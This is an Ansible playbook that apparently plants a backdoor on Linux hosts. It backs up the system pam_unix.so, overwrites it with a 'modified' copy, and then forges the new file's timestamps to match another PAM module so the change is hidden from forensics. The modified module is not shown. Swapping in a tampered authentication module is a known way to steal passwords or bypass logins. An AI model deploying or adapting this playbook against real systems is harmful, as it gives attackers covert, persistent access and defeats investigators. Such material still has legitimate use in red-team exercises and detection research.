---
- name: Backup old pam_unix.so
  ansible.builtin.copy:
    src: /lib/x86_64-linux-gnu/security/pam_unix.so
    dest: /lib/pam.d/

- name: Copy over modified pam_unix.so
  ansible.builtin.copy:
    src: pam_unix.so
    dest: /lib/x86_64-linux-gnu/security/pam_unix.so
    owner: root
    group: root
    mode: 0644

- name: Get timestamps of other PAM modules
  ansible.builtin.stat:
    path: /lib/x86_64-linux-gnu/security/pam_permit.so
  register: pam_stat

- name: Timestomp new pam_unix.so
  ansible.builtin.file:
    path: /lib/x86_64-linux-gnu/security/pam_unix.so
    modification_time: '{{ pam_mod_time }}'
    access_time: '{{ pam_access_time }}'
  vars:
    pam_mod_time: pam_stat.mtime
    pam_access_time: pam_stat.atime

